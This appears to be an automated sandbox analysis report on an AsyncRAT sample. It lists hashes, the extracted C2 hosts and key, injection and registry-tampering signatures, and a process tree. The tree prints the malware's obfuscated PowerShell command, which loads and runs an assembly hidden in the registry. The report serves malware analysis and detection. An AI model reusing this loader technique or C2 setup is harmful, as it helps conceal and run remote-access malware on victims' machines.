Analysis
-
max time kernel
150s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
06-08-2024 01:19
Static task
static1
Behavioral task
behavioral1
Sample
1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe
Resource
win10v2004-20240802-en
General
-
Target
1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe
-
Size
322KB
-
MD5
59d3bc9ca446bf4fcce3a93cdbce134a
-
SHA1
37120e1b71956b5f3852605db0f33f4565a3952d
-
SHA256
1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db
-
SHA512
d23ddc6d55d8bf237e68d946f1a330a14907ea2b891ccea0890f63ee0f47f746b6e1d9d2151da1744b36d14b06b428fe308ffd97ae44732f3491682610950b63
-
SSDEEP
6144:3RptkRZIFoIkY/7J81GyQUMTa5+suXqWxHNDf1CPyysAosQSPJHdlLTpn:jHoIfjJ80Rl86xHTCPvsASQJHd
Malware Config
Extracted
asyncrat
0.5.8
blue.o7lab.me:7777
server.underground-cheat.xyz:7777
RPYntXGt1eJi
-
delay
3
-
install
true
-
install_file
WinUpdate.exe
-
install_folder
%AppData%
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2804 created 428 2804 powershell.EXE 5 -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000700000001923a-9.dat family_asyncrat -
Executes dropped EXE 2 IoCs
pid Process 2212 Install.exe 2116 $77svchost.exe -
Loads dropped DLL 2 IoCs
pid Process 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe -
pid Process 2804 powershell.EXE -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini WMIADAP.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2804 set thread context of 3068 2804 powershell.EXE 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77svchost.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70166ac09ee7da01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2804 powershell.EXE 2804 powershell.EXE 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe 3068 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2804 powershell.EXE Token: SeDebugPrivilege 2804 powershell.EXE Token: SeDebugPrivilege 3068 dllhost.exe Token: SeAuditPrivilege 856 svchost.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 2368 wrote to memory of 2212 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 30 PID 2368 wrote to memory of 2212 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 30 PID 2368 wrote to memory of 2212 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 30 PID 2368 wrote to memory of 2212 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 30 PID 2368 wrote to memory of 2212 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 30 PID 2368 wrote to memory of 2212 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 30 PID 2368 wrote to memory of 2212 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 30 PID 2368 wrote to memory of 2116 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 32 PID 2368 wrote to memory of 2116 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 32 PID 2368 wrote to memory of 2116 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 32 PID 2368 wrote to memory of 2116 2368 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe 32 PID 2096 wrote to memory of 2804 2096 taskeng.exe 34 PID 2096 wrote to memory of 2804 2096 taskeng.exe 34 PID 2096 wrote to memory of 2804 2096 taskeng.exe 34 PID 2804 wrote to memory of 3068 2804 powershell.EXE 36 PID 2804 wrote to memory of 3068 2804 powershell.EXE 36 PID 2804 wrote to memory of 3068 2804 powershell.EXE 36 PID 2804 wrote to memory of 3068 2804 powershell.EXE 36 PID 2804 wrote to memory of 3068 2804 powershell.EXE 36 PID 2804 wrote to memory of 3068 2804 powershell.EXE 36 PID 2804 wrote to memory of 3068 2804 powershell.EXE 36 PID 2804 wrote to memory of 3068 2804 powershell.EXE 36 PID 2804 wrote to memory of 3068 2804 powershell.EXE 36 PID 3068 wrote to memory of 428 3068 dllhost.exe 5 PID 3068 wrote to memory of 476 3068 dllhost.exe 6 PID 3068 wrote to memory of 484 3068 dllhost.exe 7 PID 3068 wrote to memory of 492 3068 dllhost.exe 8 PID 3068 wrote to memory of 600 3068 dllhost.exe 9 PID 3068 wrote to memory of 676 3068 dllhost.exe 10 PID 3068 wrote to memory of 748 3068 dllhost.exe 11 PID 3068 wrote to memory of 812 3068 dllhost.exe 12 PID 3068 wrote to memory of 856 3068 dllhost.exe 13 PID 3068 wrote to memory of 964 3068 dllhost.exe 15 PID 3068 wrote to memory of 268 3068 dllhost.exe 16 PID 3068 wrote to memory of 1036 3068 dllhost.exe 17 PID 3068 wrote to memory of 1056 3068 dllhost.exe 18 PID 3068 wrote to memory of 1120 3068 dllhost.exe 19 PID 3068 wrote to memory of 1140 3068 dllhost.exe 20 PID 3068 wrote to memory of 1184 3068 dllhost.exe 21 PID 3068 wrote to memory of 1996 3068 dllhost.exe 23 PID 3068 wrote to memory of 832 3068 dllhost.exe 24 PID 3068 wrote to memory of 1348 3068 dllhost.exe 25 PID 3068 wrote to memory of 2328 3068 dllhost.exe 26 PID 3068 wrote to memory of 1360 3068 dllhost.exe 27 PID 3068 wrote to memory of 2096 3068 dllhost.exe 31 PID 3068 wrote to memory of 2116 3068 dllhost.exe 32 PID 3068 wrote to memory of 1540 3068 dllhost.exe 33 PID 3068 wrote to memory of 2804 3068 dllhost.exe 34 PID 3068 wrote to memory of 2808 3068 dllhost.exe 35
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:428
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6642a619-f8c2-48ba-8683-47b375d8b1fd}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:600
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:832
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1348
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:748
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:812
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1120
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\system32\taskeng.exetaskeng.exe {B3DEDF06-6686-4CE8-9693-AD1A04011BA6} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804
-
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵
- Drops file in System32 directory
PID:1540
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:964
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:268
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1036
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1056
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1140
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1996
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2328
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1360
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:484
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:492
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe"C:\Users\Admin\AppData\Local\Temp\1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Users\Admin\AppData\Local\Temp\$77svchost.exe"C:\Users\Admin\AppData\Local\Temp\$77svchost.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2116
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2117472631-11691903212819810-45914988-12442447972085881961-1726430524251014739"1⤵PID:2808
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
45KB
MD5a44a767dba207c04c74afae17144f787
SHA1fa14f38216e259be5b181c825719f1c864691a5f
SHA25626eaa5bce06cadc54cb4990fabb1b9150966ef720b07a836ef2bd456360246b2
SHA5127dfd6e182ac9f16b29843cb0eabaa7db02fa3ee59c65c7822d9213859c4a7185d0fdcd1d51747a11b4fdd3a7947ea14fdc7fa583c13b4d3edf50b8d6d3178619
-
Filesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa